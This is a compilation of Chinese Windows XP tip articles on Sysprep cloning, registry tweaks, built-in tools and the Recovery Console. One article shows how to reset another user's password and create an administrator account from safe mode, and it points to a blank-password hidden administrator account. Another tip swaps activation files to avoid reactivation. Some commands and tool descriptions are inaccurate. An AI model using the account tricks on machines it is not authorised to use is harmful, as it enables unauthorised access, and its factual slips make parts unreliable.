    然后我们要把计算机的ACPI属性更改为Standard PC，这是因为如果目标计算机中有不同类型的ACPI，则新克隆的目标计算机就无法实现电脑软关机，并且可能会在第一次启动后崩溃！更改步骤如下：

    ① 在设备管理器控制台窗口用鼠标右键单击“计算机”→“ACPI Uniprocessor PC”，在弹出菜单上单击“更新驱动程序”菜单项；

    ② 在打开的“硬件更新向导”对话框里选中“从列表或指定位置安装（高级）”选项，并单击“下一步”按钮；

    ③ 在接下来的页面里选中“不要搜索，我要自己选择要安装的驱动程序”选项，并单击“下一步”按钮；

    ④ 然后选择“Standsrd PC”选项，并根据屏幕提示一路Next, 只是最后提示是否重新启动时，一定不要重启！

    3. 更新IDE控制器属性

    对设备驱动程序的最后一步手术是更改IDE ATA / ATAPI 控制器。这一步非常重要，因为大家知道，不同的主板，例如Intel、Nforce 2、VIA等主板，其IDE ATA / ATAPI控制器的驱动程序有很大的差别，根本无法通用！

    ① 在设备管理器控制台窗口用鼠标右键单击IDE ATA / ATAPI控制器、Intel (r) 82371 AB / EB Bus Master IDE Controller，在弹出菜单上单击“更新驱动程序”菜单项；

    ② 在打开的“硬件更新向导”对话框里选中“从列表或指定位置安装（高级）”选项，并单击“下一步”按钮；

    ③ 在接下来的页面里选中“不要搜索，我自己选择要安装的驱动程序”选项，并单击“下一步”按钮；

    ④ 然后选择“标准的双通道PCI IDE控制器”选项，并根据屏幕提示一路Next，只是最后提示是否重新启动时，一定不要重启！

  四、准备主映像文件

    删除了“母机”上的驱动程序，还不能说已经马到成功。这是因为每一台计算机都有一个惟一的安全标识符(SID: security identifier)，如果直接把磁盘映像复制到其他计算机上，那么其他计算机都有会具有同样的SID，所以需要用Sysprep工具去除“母机”的SID，从而强迫目标计算机产生新的SID。

    1. 自动应答文件

    在目标计算机恢复克隆备份时，系统会开始一个Mini-Setup向导过程，该向导会提示我们输人特定的计算机变量，例如管理员密码、计算机名等等。但是由于在克隆备份里去除了驱动程序，所以在这个阶段无法使用键盘、鼠标进行交互。不过我们可以创建一个自动安装应答文件，让这个应答文件自动回复安装程序提出的问题。

    ① 把Windows XP安装光盘插人光驱，将\SUPPORT\TOOLS\目录下的DEPLOY.CAB文件释放到C:\Sysprep目录；

    ② 然后运行其中的setupmgr.exe文件，在出现选择安装类型界面中选择“Sysprep安装”选项；

    ③ 根据屏幕提示填入必要的信息，一直单击“Next”按钮，直至最后进人保存配置文件的对话框，一定要确保最后的安装脚本路径是C:\Sysprep\sysprep.inf。

    2．重新封装

    现在可以利用Sysprep工具去除“母机”的SID，很简单：运行C:\Sysprep目录下的Sysprep.exe程序，然后在打开的窗口中单击“重新封装”按钮。接下来会提示下一次启动时将重新生成SID，单击“确定”按钮，稍等片刻，计算机将会自动关闭。

    五、克隆主映像文件

    计算机关闭之后，我们就可以用Ghost 2003启动盘引导计算机，然后依次单击“Local→Partition→To Image”命令，指定源分区为C盘，再设置Ghost映像文件的路径和文件名，开始备份。备份结束后，我们就拥有了一个万能的Windows XP映像文件！


忘记Windows XP登录密码的解决方案

《一键清理系统垃圾》

忘记Windows XP登录密码的解决方案

《中国电脑教育报》马明臣

    笔者一朋友的计算机安装的是Windows XP操作系统，不慎忘记了系统登录用户“zhangbq”的密码，而且在安装时也没有做相应的应急盘，于是找到笔者希望能解决这个问题，经过多种方法进行尝试，最后我终于成功地找到两种方法解决了问题，现把这两种方法介绍如下：

    一、利用NET命令

    我们知道在Windows XP中提供了“net user”命令，该命令可以添加、修改用户账户信息，其语法格式为：

    net user [UserName [Password | *] [options]] [/domain]

    net user [UserName {Password | *} /add [options] [/domain]

    net user [UserName [/delete] [/domain]]

    每个参数的具体含义在Windows XP帮助中已做了详细的说明，在此笔者就不多阐述了。好了，我们现在以恢复本地用户“zhangbq”口令为例，来说明解决忘记登录密码的步骤：

    1、重新启动计算机，在启动画面出现后马上按下F8键，选择“带命令行的安全模式”。

    2、运行过程结束时，系统列出了系统超级用户“administrator”和本地用户“zhangbq”的选择菜单，鼠标单击“administrator”，进入命令行模式。

    3、键入命令：“net user zhangbq 123456 /add”，强制将“zhangbq”用户的口令更改为“123456”。若想在此添加一新用户（如：用户名为abcdef，口令为123456）的话，请键入“net user abcdef 123456 /add”，添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户，并使其具有超级权限。

    4、重新启动计算机，选择正常模式下运行，就可以用更改后的口令“123456”登录“zhangbq”用户了。

    二、利用“administrator”

    我们知道在安装Windows XP过程中，首先是以“administrator”默认登录，然后会要求创建一个新账户，以便进入Windows XP时使用此新建账户登录，而且在Windows XP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。

    当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。

    怎么样，忘记Windows XP登录密码的用户还不赶快动手试一试。


为Windows XP添加五笔输入法

《一键清理系统垃圾》

为Windows XP添加五笔输入法

2002-01-12　　　　　　　作者：

WindowsXP已经出来不短时间了，相信很多朋友都对于其也相当熟悉了吧。大 家也应该知道，微软的所有操作系统包括WindowsXP都不自带五笔输入法的， 这可苦了我们这些五笔“高手”了，只有靠外挂的五笔输入法才能发挥我们应 有的快速输入文字的技巧，并且在WindowsXP中，所有外挂的输入法都被拒绝 放在系统输入法图标里面，要打开输入法都要通过运行输入法程序或快捷方式 才能启动输入法，多不方便。对于这个问题，我有个很好的解决方法，（此处 以万能五笔输入法为例），希望对大家有所帮助。

先把c:\!wnm (你安装万能五笔输入法的目录）下的wnmime.ime复制到 X:\windows\system32的文件夹下(X为WindowsXP所在的盘符)。

复制后就要修改注册表了。（Wanry提醒各位：修改前先导出注册表保存起 来，以防出了问题的时候可以恢复注册表。切记、切记！）

展开注册表到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts下， 右击右面窗口空白处新建一个项，命名为：E0060804

然后在E0060804这个键下右击新建四个字符串值：

一个命名为：IME file 其键值输入为：wnmime.ime
一个命名为：Layout Display Name 其键值输入为：万能五笔输入法
一个命名为：Layout File 其键值输入为：KBDUS.DLL
一个命名为：Layout Text 其键值输入为：万能五笔输入法

OK，到这里就可以关闭注册表，在任务栏右击输入法的快捷图标，选择“设 置”，在设置中选择“添加”，在弹出的“选择输入法”对话框中找到万能五 笔输入法，点击“确定”添加到输入法里面，添加万能五笔输入法到此结束。

另外，其它的输入法也可以像这样添加，至于其它输入法的详细步骤Wanry在 这里就不详述了，你们自己去探索吧！还要提醒的是记住在修改前先导出注册 表保存，不然的话…… ^O^

还有告诉大家一个小小的技巧：如果把上面Layout Display Name的值输为其它文 字，如：张三的五笔输入法，其输入法名称再也不是万能五笔输入法了，而变 成了张三的五笔输入法，如果你是高手的话还可以把图标换一换呢，那你也就 拥有以自己名字起名且图标非常酷的输入法了，如果你也想拥有这样的输入 法，那你还不快点试试。


五步轻松解决Windows XP互访问题

《一键清理系统垃圾》

五步轻松解决Windows XP互访问题

    曾经遇到很多用户抱怨，在局域网内安装了Windows XP的电脑不能与安装了Windows 98的电脑互相访问，安装了Windows XP的电脑与安装了Windows XP的电脑也不能互相通信。见过很多高手提供的高招，归纳起来有以下4点：一是开启GUEST账号；二是安装NetBEUI协议；三是查看本地安全策略设置是否禁用了GUEST账号；四是设置共享文件夹。然而，即便把这4点都做到了，有时也仍然解决不了Windows XP的互访问题。因为在Windows XP中要想实现互访，还需设置这一步：

    在Windows桌面上用右击“我的电脑”，选择“属性”，然后单击“计算机名”选项卡，看看该选项卡中有没有出现你的局域网工作组名称，如“TL2000”等。然后单击“网络ID”按钮，开始“网络标识向导”：单击“下一步”，选择“本机是商业网络的一部分，用它连接到其他工作着的计算机”；单击“下一步”，选择“公司使用没有域的网络”；单击“下一步”按钮，然后输入你的局域网的工作组名，如“TL2000”，再次单击“下一步”按钮，最后单击“完成”按钮完成设置。

    重新启动计算机后，局域网内的计算机就可以互访了。


消除WindowsXP中的复制乱码

《一键清理系统垃圾》

消除WindowsXP中的复制乱码

02-03-11　　 作者：
题目很奇怪吧？WindowsXP中怎么会有复制乱码？当然有！如果你设置不当就会很容易的出现！

前不久！我对我的WindowsXP做了一番大规模的设置：包括区域、系统、网络等方面的，结果当我设置完成以后，发现如果我从一些软件上复制内容到记事本里面会出现乱码，而且如果复制到Word里面也不能够正常显示，除非复制到Ultraedit里面。结果当然是我只能用Ultraedit做中转站，把从一些软件上要扶植的内容先复制到Ultraedit里面，然后在复制到其他的软件中去，这样做很是麻烦，但是我又没有其他更好的办法，为此事我还到一些网站上去求救（包括中国程序员网站），结果都没有得到很好的答复。没有办法，我只好先将就着用着吧。

直到有一天，我发现从金山词霸2002上复制内容也不能够正常复制的时候，我想到了金山论坛，于是在金山论坛上发表了一个帖子寻求帮助，几天后我重新来到金山论坛，发现金山公司已经给出了解决方案。仔细看过解决方案以后我恍然大悟，知道我在哪里犯下了一个错误，同时也清楚地看到WindowsXP还是有些地方做的不是很好。下面将详细地把方案提供给大家。

问题出在输入法里面，WindowsXP默认的输入法为英语，键盘模式为美式键盘，这个选项一直用于Win98中，同时提供的还有中文键盘的模式，由于Win98中使用美式键盘没有任何问题，所以我在设置的时候，把中文键盘删除了，只保留了英文键盘。就是由于这个问题才出现复制中出现伦马的问题。直到这些就很好办了，删除英文的美式键盘模式，添加中文键盘模式并且设置为默认值就OK了。

如果大家也和我碰到同样的问题，大家可以采取上面的办法来解决，希望大家能够很方便的使用你的WindowsXP。


修改Windows XP设置技巧集之开关机篇

《一键清理系统垃圾》

修改Windows XP设置技巧集之开关机篇

  1、加快XP开机及关机速度

    在〔开始〕→〔运行〕→键入〔Regedit〕

    找到HKEY_CURRENT_USER\Control Panel\Desktop键，将右边窗口的WaitToKillAppTimeout改为1000

    (原设定值：20000 )即关闭程序时仅等待1秒。

    将键值HungAppTimeout的数值改为：200(原设定值：5000 )，表示程序出错时等待0.5秒。

    找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control

    将键值WaitToKillServiceTimeout设为：1000或更小。(原设定值：20000 )

    将键值〔HungAppTimeout〕的数值资料更改为〔200〕

    2、加快预读能力改善开机速度

    Windows XP预读设定可提高系统速度，加快开机速度。

    在〔开始〕→〔运行〕→键入〔Regedit〕找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ MemoryManagement在PrefetchParameters右边窗口将〔EnablePrefetcher〕的数值资料如下更改：

    PIII 800MHz以上的可尝试将数值资料更改为〔4〕或〔5〕

    以下的建议保留数值资料为预设值即〔3〕

    3、关机时自动关闭停止回应程序

    让系统自动关闭停止回应的程序。

    打开注册表HKEY_CURRENT_USER\Control Panel\Desktop键，将AutoEndTasks值设为1。(原设定值：0 )

    4、在启动电脑时运行Defrag程序

    在〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕

    →〔SOFTWARE〕→〔Microsoft〕→〔Dfrg〕→〔BootOptimizeFunction〕

    将键值〔Enable〕设定为〔Y〕等于开启而设定为〔N〕等于关闭

    5、减少多重启动时等待时间

    打开开始\控制面板\系统\进阶\启动及修复项目\按设定\系统启动\预设操作系统--两个项目都打勾-填入您想等待的时间ps :假如填入"0"系统将不会让您等待而直接载入您上次选定的操作系统

    另一个方法

    用Notepad打开在C:\目录下的boot.ini档案，将内容〔timeout〕的设定值由预设的30 (秒)改为要求等待的时间--存档

    6、减少Windows XP开机载入区域网络时等待的时间

    打开网络连接

    用右键查看“本地连接”的“属性”

    在一般下面，选“Internet协议(TCP/IP)”按内容

    使用固定的IP地址，以后开机就不会停顿了

  7、使用微软Bootvis.exe最佳化启动速度

    先下载bootVis.exe档案，然后解压后运行〔bootvis.exe〕

    在〔Trace〕选〔next boot + driver delays〕或其他选择项目后XP会重新启动并将记录启动资料产生成BIN的文件。

    再在〔Bootvis.exe〕→〔file〕→〔open〕中打开这个文件→在〔Trace〕→选〔Optimize system〕

    此优化需时颇长，请耐心等待

    8、移除启动时载入不需要的程序

    如开机时太多程序要运行时会影响开机的速度，先检查那些程序会在开机时运行

    在〔开始〕→〔运行〕→键入〔msconfig〕→选〔启动〕

    在启动内的程序是代表开机时要运行的程序，如须暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可，如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可

    如希望彻底移除者在〔msconfig〕→〔启动〕的左边栏〔位置〕上便显示引导程序运行的位置

    其中：

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    其中的〔HKLM〕代表登录档上的〔HKEY_LOCAL_MACHINE〕

    在〔Run〕的右边窗口不需要的项目删除

    HKCU\Software\Microsoft\Windows\CurrentVersion\Run

    其中的〔HKCU〕代表登录档上的〔HKEY_CURRENT_USER〕

    在〔Run〕的右边窗口不需要的项目删除

    SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    则代表登录档的路径如下

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg

    检查在〔startupreg〕下的路径，将不需要的项目删除

    Common Startup

    代表在〔开始〕→〔所有程序〕→〔启动〕的程序

    只要在取消在〔msconfig〕→〔启动〕内〔□〕不选〔X〕符号便会代为将程序移离〔启动〕

    9、加快开机的时间-停用不需要的服务

    Windows在开机时会先载入很多不见得用得到的程序，以下的方法可以让您选择您需要载入的程序，但如您非系统高手不建议您动这个项目：

    关掉一些伴随着Windows启动的程序,及常驻程序!!在"开始"--> "运行"中

    输入msconfig进入"系统设定公用程序"在"启动"关掉不必要的程序,将方框中的勾勾取消,关掉不

    必要的程序,不确定的程序不可以乱关,以免造成Windows错误!!

    (先试试是否可以在软件本身取消常驻,不行再用此方法!!),完成后按"套用",重开机!!

    10、制做XP开机磁盘

    XP要做开机磁盘

    把磁盘插入软驱-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘

    11、XP的自动关机问题

    如果不能自动关机的话

    控制面板-->电源-->显示-->屏幕保护程序-->电源管理-->APM打勾

    这样应该就可以了

    如果还不行,应该是BIOS的问题

  12、关机有文本文档

    在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>

    键入rundll.exe user.exe,exitwindows

    在<选择文本文档的名称>键入<关闭Window>或你想要的名称-> 按<完成>

    13、重新启动有文本文档

    在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>

    在<命令行>键入rundll.exe user.exe,exitwindowsexec

    在<选择文本文档的名称>键入<重新启动Restart>或你想要的名称-> 按<完成>

    14、备份及还原窗口启动档

    如需重装Windows XP，重装后必须重新启动，如按下列办法可解决此问题

    备份

    在\Windows\system32目录下将wpa.dbl及Wpa.bak用软盘备份

    还原

    重装Windows XP后，进入〔安全模式〕，在\Windows\system32目录下将wpa.dbl改名为wpadbl及wpa.bak改名为wpabak

    然后将备份的wpa.dbl及Wpa.bak抄回此目录。

    重新启动电脑按〔检查Windows XP是否登记〕办法更改登录注册

    注：因Windows XP对硬件的更改次数有所限制，所以只适用于重装系统或小量更改硬件。

    15、修复Windows XP的启动

    由于在安装Windows XP后再安装其他版本的Windows而导致启动后不能进入Windows XP。

    原因是当安装其他版本的Windows时，C盘的已被新安装的其他版本Windows取替，除了用其他的软件外，可尝试按以下办法进行修改，此更改不会提供任何支持及仅适用于FAT32格式，Windows 2000因系统较接近Windows XP，因此成功机会大，如属Windows 98或Windows ME未能成功修复者，可使用有关版本的启动磁盘启动电脑后在〔A:\>〕下键入〔Sys :〕后从新开机便可。

    被Windows 98或ME占用了启动系统

    先预备一张Win98的安装启动磁片。

    进入Windows 98或ME用Notepad去编辑一个名为Read.scr内容如下。

    -------------------------

    L 100 2 0 1

    N C:\BOOTSECT.DOS

    R BX

    0

    R CX

    200

    W

    Q

    --------------------------

    将档案存在Windows 98或ME的安装启动磁片及用此磁片启动电脑

    如果C盘下有个名为BOOTSECT.DOS的档案便在A:>下先运行此命令

    ATTRIB C:\BOOTSECT.DOS -S -H -R

    然后在A:>下键入DEBUG

    如刚才修改了BOOTSECT.DOS档案的属性再在A:>下先运行此命令：

    ATTRIB C:\BOOTSECT.DOS＋S＋H＋R

    在BIOS设定用CD启动电脑，然后将Windows XP光盘放入及启动电脑。

    让光盘自动运行至停止便会出现三个选择，按〔R〕选修复电脑便会询问要进入哪个系统，选中你要进入的系统按〔Enter〕键，然后输入Administrator密码(与安装时输入的Administrator密码相同)如果没有密码直接按Enter便可。

    在X:\Windows> 下键入Fixboot及按〔Y〕确认。

    X = Windows XP所安装驱动器的盘符。

    完成后取出Win XP光盘及键入〔Exit〕会重新启动电脑。

    在BIOS选回用硬盘启动电脑便可。

    如未能正常显示多重启动选单者可修改C盘根目录的Boot.ini档案。


隐藏在WinXP中的秘密武器

《一键清理系统垃圾》

隐藏在WinXP中的秘密武器

随着硬件价格一再下降，使用Windows XP的朋友们也越来越多。Windows XP在给我们带来
全新体验的同时，还给我们带来了许多非常实用的程序。不要小看了它们，只要你巧妙地利用
，就能实现很多意想不到的功能。

--------------------------------------------------------------------------------

  1.免费的系统教程（system32文件夹下）
    安装完Windows XP后很想马上学习并体验一下它的魅力吗？我们无需再东奔西走去找烦人
的文字教材。只要选择“开始”→“漫游Windows XP”，就会出现界面，它将引导我们游历W
indows XP的新功能。
    小提示：Windows XP中自带的教程非常形象，是图形界面的，而且制作得相当精美，微软
的权威性可想而知。如果你的“开始”菜单上没有“漫游Windows XP”项目，则可以运行C:＼
Windows＼System32＼tourstart.exe进入。
  2.辅助功能向导——Accwiz（system32文件夹下）
    我们知道，微软在Windows中为残疾人士提供了辅助功能，使他们也能xx作计算机。该程
序可以根据用户的视觉、听力和行动来配置我们的Windows，使残疾人士能根据自身情况更好
地使用Windows。
  3.字符映射表——Charmap（system32文件夹）
    是不是觉得Word的“插入符号”功能非常方便？我们在其他Windows程序中也常常要插入
一些特殊符号，而一个个地找又麻烦，这时可使用“字符映射表”程序帮忙。通过“字符映射
表”可查看选定字体中有哪些字符，选中后单击“选定”和“复制”按钮，即可把选定字符复
制到Windows剪贴板中，供字处理软件粘贴使用。
    小提示：用它来复制特殊字体中的特殊符号特别有用。
  4.仓颉拼音输入法——CINTSETP(system32＼IME＼Cintlgnt文件夹下)
    微软新仓颉输入法98b的安装程序，微软把它放在简体中文版Windows XP中，但埋藏得较
深。不过它很有用，安装后就会在Windows中新增一个“中文（台湾）”的仓颉输入法，利用
它可以在简体中文Windows XP上通过输入繁体汉字。这对于从中国港澳台地区至内地工作的人
提供了方便。
  5.磁盘清理大师——Cleanmgr（system32文件夹下）
    尽管现在的硬盘越来越大，但它总有容量的限制。在你不经意地安装这个或那个软件的过
程中，可能会因为硬盘空间已频频告急而影响了正常Windows程序的执行。不要急，请打开此
程序，它会自动地释放出一部分硬盘空间，并会智能化地进行删除xx作，保证你的系统万无一
失。这比从资源管理器中删除要安全多了。
  6.剪贴板查看器——Clipbrd（system32文件夹下）
    Windows剪贴板为我们在各个Windows程序间的信息交流提供了一个桥梁。但这部分数据一
般情况下无法看到。不过，使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。Windows
XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能，通过设置权限允许
其他网上用户将该剪贴板装入使用。
  7.控制面板启动器——Control.exe（system32文件夹下）
    控制面板是Windows的一个重要组成部分，许多设置都通过他完成。而双击这个文件就是
最快打开系统控制面板的方法，可省去从“开始”菜单上层层点击的麻烦。
  8.Windows XP的诊断医生——Drwtsn32（system32文件夹下）
    Drwtsn32是一个程序错误调试器。DrWatson程序会获得并记录运行Windows的计算机上的
程序错误的信息。只要检测到错误，就会创建一个文本文件 (Drwtsn32.log)，提供错误原因
的详细说明，并给出解决问题的建议性xx作，在与Microsoft技术支持联系并请求帮助时，Dr
watson将会起到很大作用。
  9.DVD播放器——DVDplay（system32文件夹下）
    随着DVD驱动器和DVD光盘价格的下降，在普通家庭电脑上配置一个DVD播放器已不是一件
奢侈的事情。而要播放DVD需要播放器的支持，Windows XP提供了一个“免费”的DVD播放器，
有了它我们可以省去一笔购买第三方DVD播放软件的费用。
  10.自解压文件制作工具——Iexpress（system32文件夹下）
    用过压缩软件的读者一定对自解压文件不陌生，自解压文件可在没有相应解压缩程序的情
况下直接将压缩包文件解压缩到相应的文件夹下，极大地方便了用户。利用Iexpress可制作两
种自解压文件，一种是标准自解压文件（Standard Self-Extractor），另一种是安装程序式
自解压文件（Self-Extractor for Software Installation），这样我们在发布程序时就方便
多了。另外大家要注意，尽管使用Iexpress的运行界面是英文的，但利用它生成的自解压文件
却是中文的，省去了繁琐的本地化工作。
  11.文件转移向导——Migwiz（system32＼usmt文件夹下）
    Windows系统的易用性总是和不稳定性共存的，因此在系统健康之时把当前设置保存下来
，供系统崩溃后重新安装时使用是个不错的主意。微软已把这个工具集成到“文件和设置转移
向导”程序上。通过它，我们就可以实现系统状态的备份与恢复。
  12.系统配置程序——Msconfig（Windows＼PChealth＼HELPCTR＼Binaries文件夹下）
    和Windows中的系统配置程序一样，通过这个程序，我们可对系统的一般、SYSTEM.ini、
WIN.ini、BOOT.ini、服务和启动项目进行修改。
    小提示：用它来去除系统自启动程序特别有效。
  13.备份工具——Ntbackup（system32文件夹下）
    数据是计算机中最为宝贵的资料，因此经常备份你的资料也应该成为一个好习惯。现在许
多人都寻求第三方的备份工具，其实大可不必。使用Windows XP中内置的备份工具就可以非常
方便地将资料进行备份，而且由于你使用的是微软产品，所以根本不存在兼容性问题。
  14.ODBC数据源管理器——Odbcad32（system32文件夹下）
    在Windows中访问ODBC数据源必须要有其驱动程序，该工具可以查看在Windows中已安装的
驱动程序及相关信息。
  15.IP地址侦测器——Nslookup（system32文件夹下）
    在联入互联网的每台电脑都有一个IP地址，同样，每个网站也有它的IP地址，而且是唯一
的。通过这个IP侦测工具ping就可以轻而易举地得到它们的真正IP地址。如笔者要想知道htt
p://www.xxx.com的IP地址，...S窗口下输入pingwww.xxx.com即可看到。
  16.屏幕键盘——Osk（system32文件夹下）
    屏幕键盘是一种实用工具，它在屏幕上显示虚拟键盘，允许那些有移动障碍的用户用指针
设备或游戏杆输入数据。屏幕键盘旨在为存在移动障碍的用户提供最低级别的功能。这对于不
知道如何键入的用户也很有用。它还可以用于最基本的CAI键盘教学。
  17.对象包装程序——Packager（system32文件夹下）
    通过对象包装程序我们可以打开一个文件，并引入其中的图标，将它们插入到一般Windo
ws程序中使用，可用于制作计算机类教学课件或文档。
  18.注册表编辑器增强版——Regedit32（system32文件夹下）
    注册表编辑器是用来更改系统注册表设置的高级工具。注册表中包含了有关计算机如何运
行的信息。在Windows XP中有一个名为Regedit的程序，可编辑注册表，但此程序却是它的增
强版本，除可编辑注册表外，还可设置权限、清除重复项、删除已被卸载或删除的程序项等高
级xx作。
  19.ActiveX注册和反注册工具——Regsvr32
    使用过ActiveX的人都知道，ActiveX不注册是不能够被系统识别和使用的，一般安装程序
都会自动地把它所使用的ActiveX控件注册，但如果你拿到的一个控件需要手动注册怎么办呢
？如果修改注册表那就太麻烦了，在Windows的System文件夹下有一个regsvr32.exe的程序，
它就是Windows自带的ActiveX注册和反注册工具。它的用法为：
    “regsvr32 [/u] [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为ActiveX控件文
件名，建议在安装前拷贝到System文件夹下。
    参数有如下意义：
    /u——反注册控件
    /s——不管注册成功与否，均不显示提示框
    /c——控制台输出
    /i——跳过控件的选项进行安装（与注册不同）
    /n——不注册控件，此选项必须与/i选项一起使用
    如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需
使用regsvr32 /u amovie.ocx就行了。
  20.动态链接库函数启动器——Rundll32
    在Windows中使用了许多动态链接库，这样就使得所有Windows程序都可共享这些动态链接
库中的函数。一般情况下，许多应用程序都通过Windows API来xx作这些函数，但归根结底是
通过Windows文件夹下的rundll32.exe程序来启动相应的函数。它的用法是：“rundll32.exe
动态链接库名,函数名,参数名”。如笔者需要实现一键关机，则在桌面上建立一快捷方式，
命令行为“rundll32.exe user.exe,ExitWindows”，并设置其快捷键为F4即可。再如，笔者
要打开控制面板，则只需要输入命令“rundll32.exe shell32.dll,Control_RunDLL”即可，
要打开桌面属性，只需要使用“rundll32.exe shell32.dll,Control_RunDLL desk.cpl”，其
余的以此类推。
  21.系统文件检查器——Sfc（system32文件夹下）
    使用Windows难免不会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去
重装系统，又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe，一切都会变得非常简单。

  22.共享文件夹设置工具——Shrpubw（system32文件夹下）
    同一工作组的同事在一起工作，有时必须与同事们共享文件夹，这时我们可以利用此工具
轻松搞定。它的作用与右击一文件夹，选择“共享”基本上等价。
  23.Microsoft 签字验证工具——Sigverif（system32文件夹下）
    所谓“签署的文件”，就是被授予Microsoft数字签署的文件。该签署表明，该文件是原
始文件的一模一样的副本。通过Microsoft签字验证工具 ，我们可在计算机上查找已签署和未
签署的文件，也可查看签署文件的身份验证，以确认该文件还没有被篡改。使用起来非常方便
，和查找窗口几乎没有什么不同，只要给出搜索范围，就可搜索出指定范围内的已签署文件和
未签署文件。
  24.音量控制程序——Sndvol32
    我们在Windows任务栏上可见到一个可爱的小喇叭，当我们双击它时就会弹出音量控制面
板，其实这时我们就是启动了一个Windows文件夹下的sndvol32.exe文件。不信，请你进入Wi
ndows文件夹，再打开sndvol32.exe文件看看，熟悉的“音量控制”面板是否已经在你眼前了
？另外还要告诉大家，它还有一个隐藏的参数“/r”，利用此参数可快速地打开录音控制面板
，这样我们只要在桌面上建立一指向C:＼Windows＼Sndvol32.exe的快捷方式，并令它的参数
为/R（即在目标中填入“C:＼Windows＼Sndvol32.exe /R”），就可以快速打开录音控制面板
选择输入设备了。如果设备过多，在面板上容纳不下时，试着按“Ctrl+S”键，不管有多少设
备都能够完全显示。
  25.任务管理器——Taskmgr（system32文件夹下）
    任务管理器提供正在你的计算机上运行的程序和进程的相关信息，使用任务管理器可快速
查看正在运行的程序的状态，或终止已停止响应的程序。也可使用多达15个的参数评估正在运
行的进程的活动，以及查看CPU和内存使用情况的图形和数据。当计算机发生锁死时使用它最
方便和有效。
  26.远程连接程序——Telnet（system32文件夹下）
    在Internet上有无数的计算机，而要访问它们都必须通过建立远程连接才行，进行两个计
算机的远程连接可用专门软件实现，但通过Windows自带的远程连接程序telnet.exe也能完成
这一xx作，而且它还是纯中文界面软件。
  27.远程FTP工具——Tftp（system32文件夹下）
    FTP是一个网络传输的协议，通过这个程序可非常方便地连接到对方的服务器上进行文件
的存取xx作，省得再找如第三方的FTP软件了，可惜的是它是字符界面。
  28.Windows升级程序——Wupdmgr（system32文件夹下）
    安装完Windows后，在开始菜单的上方会有Windows Update菜单项，通过它能自动登录到
Microsoft公司的网站上完成自己Windows的升级工作。但时间一长，可能会把这个快捷方式误
删除了，这时我们就可以通过打开Windows下的Wupdmgr.exe文件来完成这个功能。
    Windows XP是一个操作系统，但它并不仅仅是一个操作系统，只有充分地发挥其内置功能
，才能更好地使用它。这也符合“基础的未必是最坏的，回到基础还是好的”的道理。 （文
章来源：大众软件）


用Win 2K/XP/2003的故障恢复控制台

《一键清理系统垃圾》

用Win 2K/XP/2003的故障恢复控制台

    故障恢复控制台是Windows 2000/XP/2003中专用于修复系统的工具，它可以启用和禁用服务、格式化驱动器、在本地驱动器上读写数据(包括被格式化为NTFS文件系统的驱动器)，并执行许多其他管理任务，是我们连Windows 2000/XP/2003安全模式都无法进入时修复系统的“法宝”。本期E12版有安装故障恢复控制台的介绍文章，本文将对故障恢复控制台做进一步的探讨。

    1.使用故障恢复控制台

    计算机启动时选择“Microsoft Windows Recovery Console”(即故障恢复控制台)后，当系统给出提示时，输入管理员(Administrator)密码。然后在系统提示符下，键入“Recovery Console”命令。输入“help”可得到一列命令名称，输入“help命令名称”可得到指定命令的帮助。

    在故障控制台中，我们可以使用Attrib、Batch、Bootcfg、ChDir (CD)、Chkdsk、Cls、Copy、Delete (Del)、Dir、Disable、Format、Diskpart、Enable、Expand、Fixmbr、Fixboot等命令，对计算机出现的各种问题进行修复。

    2.实用命令介绍

    显然，故障恢复控制台中的很多命令是我们已经很熟悉的，在此不再赘述。下面为大家介绍一般用户平时不常使用的命令，利用它们，我们可以轻松地完成许多系统维护工作。

    ①Diskpart

    作用：创建和删除硬盘驱动器上的分区。

    语法：Diskpart [/add | /delete] [device_name | drive_name | partition_name] [size]

    参数：如果不带任何参数，将启动Diskpart的Windows字符模式版本。

    /add——创建新的分区；

    /delete——删除现有分区；

    drive_name——以驱动器号表示的待删除分区，仅与“/delete”同时使用，如“E:”；

    partition_name——以分区名称表示的待删除分区，可代替“drive_name”，使用(仅与“/delete”同时使用)；

    size——要创建的分区大小，以兆字节(MB)表示，仅与“/add”同时使用。

    实例：

    删除F分区——diskpart /delete F:

    创建一个200MB的分区——diskpart /add \Device\HardDisk0 200

    ②Fixboot

    作用：将新的分区引导扇区写到指定分区。

    语法：Fixboot [drive]

    参数：如果不带任何参数，Fixboot命令将向用户登录的系统分区写入新的分区引导扇区。如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令，除非你访问的驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。

    实例：向驱动器D的系统分区写入新的分区引导扇区——Fixboot D：

    3.删除故障恢复控制台

    虽然故障恢复控制台很好用，但如果你不喜欢它了，可以手工将它删除。方法是：

    打开“我的电脑”，双击安装了故障恢复控制台的硬盘驱动器，假设为C盘。单击“工具→文件夹选项”，选择“查看”选项卡，选中“显示所有文件和文件夹”选项前的复选框，清空“隐藏受保护的操作系统文件”选项前的复选框，“确定”后退出。

